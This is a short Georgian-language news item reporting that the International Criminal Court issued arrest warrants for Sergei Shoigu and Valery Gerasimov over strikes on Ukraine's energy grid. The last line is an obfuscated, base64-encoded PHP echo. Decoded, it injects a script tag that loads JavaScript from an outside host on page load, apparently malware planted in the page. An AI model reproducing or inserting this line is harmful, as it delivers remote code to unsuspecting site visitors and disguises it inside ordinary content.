celsiusi
ავერსი შნაიდერი

 ჰააგის სისხლის სამართლის საერთაშორისო სასამართლომ რუსეთის ყოფილი თავდაცვის მინისტრის, სერგეი შოიგუსა და გენერალური შტაბის ხელმძღვანელის, ვალერი გერასიმოვის დაკავების ორდერი გასცა.

შოიგუსა და გერასიმოვის დაკავების ორდერები უკრაინაში ინტერვენციისას ჩადენილი დანაშაულებისთვის გაიცა.

როგორც ჰააგის სასამართლოს მოსამართლეებმა დაადგინეს, არსებობს გონივრული ეჭვი, რომ შოიგუსა და გერასიმოვს ეკისრებათ პასუხისმგებლობა რუსეთის არმიის მიერ, სულ მცირე, 2022 წლის 10 ოქტომბრიდან 2023 წლის 9 მარტამდე პერიოდში უკრაინულ ენერგეტიკულ ინფრასტრუქტურაზე განხორციელებულ დარტყმებზე. სასამართლოს განცხადებით, აღნიშნულ პერიოდში მრავალი დარტყმა განხორციელდა რუსეთის შეიარაღებული ძალების მიერ უკრაინის სხვადასხვა რეგიონში მრავალ ელექტროსადგურსა და ქვესადგურზე.

132
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");